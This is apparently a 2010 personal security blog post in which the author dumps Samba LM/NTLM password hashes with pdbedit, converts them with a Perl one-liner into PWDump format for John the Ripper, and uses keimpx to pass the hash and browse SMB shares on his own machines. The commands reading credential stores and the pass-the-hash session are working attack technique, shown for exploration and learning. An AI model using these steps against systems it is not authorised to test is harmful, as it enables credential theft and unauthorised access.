2010-07-04 22:16:01

By Tim Brown

So the other day, I was pondering whether it might be possible to use the passwords Samba stores as a crib to crack Unix level passwords. On my home NAS, Samba uses a plain text smbpasswd file like so:

# cat /var/private/smbpasswd
user:1002:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:[U          ]:LCT-4C30C756:

You'll notice here that the file contains two obfuscated strings. These, it turns out correspond to the passwords hashed with the LM and NTLM algorithms typically associated with CIFS. This is great because as we all know LM hashes are broken.

On my laptop which runs Debian unstable, things are slightly different. Rather than the plaintext smbpasswd file, the hashes are stored in a binary file under /var/lib/samba/passdb.tdb. Whereas on Windows, one might need to resort to one of the PWDump variants to dump the hashes this file contains, Samba comes with the rather useful pdbedit which can parse both forms of the password file and display the contents in human readable form:

# pdbedit -s /etc/samba/smb.conf -L -v
Unix username:        user
NT username:          
Account Flags:        [U          ]
User SID:             S-1-5-21-2206498007-1140406565-3673201852-3004
Primary Group SID:    S-1-5-21-2206498007-1140406565-3673201852-513
Full Name:            Some User
Home Directory:       \\localhost\user
HomeDir Drive:        
Logon Script:         
Profile Path:         \\localhost\user\profile
Domain:               localhost
Account desc:         
Munged dial:          
Logon time:           0
Logoff time:          Tue, 19 Jan 2038 01:14:07 GMT
Kickoff time:         Tue, 19 Jan 2038 01:14:07 GMT
Password last set:    Sun, 04 Jul 2010 18:39:34 BST
Password can change:  Sun, 04 Jul 2010 18:39:34 BST
Password must change: Tue, 19 Jan 2038 01:14:07 GMT
Last bad password   : 0
Bad password count  : 0

So far so good but this doesn't seem to include any hashes. Well, pdbedit also has the ability to convert the binary file back its older smbpasswd form:

# pdbedit -s /etc/samba/smb.conf -L -w
user:1000:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:0CB6948805F797BF2A82807973B89537:[U          ]:LCT-4C2D1AD9:

Unlike my NAS, we can see that here Samba is only storing passwords using the more secure NTLM algorithm. It turns out this behaviour is controlled by the lanman auth directive.

So now that we have some hashes to play with, how can we go about cracking them? The following one liner will spit out pdbedit's output in a PWDump compatible format such that it can be user by John The Ripper:

# pdbedit -L -w | perl -e 'while (<>) { @smbpasswd = split(/:/, $_); print $smbpasswd[0] . ":" . $smbpasswd[1] . ":" . (($smbpasswd[2] eq "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") ? "NO PASSWORD*********************" : $smbpasswd[2]) . ":" . (($smbpasswd[3] eq "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") ? "NO PASSWORD*********************" : $smbpasswd[3]) . ":::\n"; }'

You'll need to tell John which set of hashes (those from LM or NTLM) you wish to crack using the --format directive.

Finally, for kicks, I tried a hash passing session using keimpx to exploit known protocol weakness in CIFS:

# ./keimpx.py -t -p 139 -c ./c
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

    keimpx 0.3-dev
    by Bernardo Damele A. G. <bernardo.damele@gmail.com>

The credentials worked in total 1 times




Do you want to get a shell from any of the targets? [Y/n] Y
Which target do you want to connect to?
> 1
Which credentials do you want to use to connect?
[1] user/01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
> 1
# shares
[1] public (type: 0, comment: )
[2] user (type: 0, comment: )
[3] IPC$ (type: 3, comment: IPC Service (localhost))
Which share do you want to connect to? (default 1) 2
# ls
Sat Jan  9 22:12:43 2010        <DIR>           .
Mon Feb  2 18:15:44 2009        <DIR>           ..

Mood: Happy

Music: Sam And The Plants - Open Cluster

1 comment(s)

You are unknown, comment